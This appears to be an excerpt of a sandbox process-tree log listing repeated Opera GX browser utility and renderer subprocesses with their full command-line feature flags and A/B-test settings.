C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8828,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8840 /prefetch:82⤵PID:7984
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=2976,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=5152 /prefetch:82⤵PID:7356
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=5600,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3128 /prefetch:82⤵PID:348
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=7452,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3184 /prefetch:82⤵PID:5056
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8796,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9028 /prefetch:82⤵PID:6020
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8832,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7316 /prefetch:82⤵PID:1984
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=7252,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=5296 /prefetch:82⤵PID:5884
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6964,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8152 /prefetch:82⤵PID:1108
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=9044,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7940 /prefetch:82⤵PID:6008
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=7116,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7240 /prefetch:82⤵PID:6904
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8576,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7284 /prefetch:82⤵PID:6816
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6708,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=4840 /prefetch:82⤵PID:4652
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8632,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=5320 /prefetch:82⤵PID:2972
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --field-trial-handle=5280,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7300 /prefetch:22⤵PID:4196
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=9084,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6504 /prefetch:82⤵PID:4608
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --field-trial-handle=5748,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6988 /prefetch:22⤵PID:3064
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8336,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8484 /prefetch:82⤵PID:7936
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6760,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7304 /prefetch:82⤵PID:6260
-
-
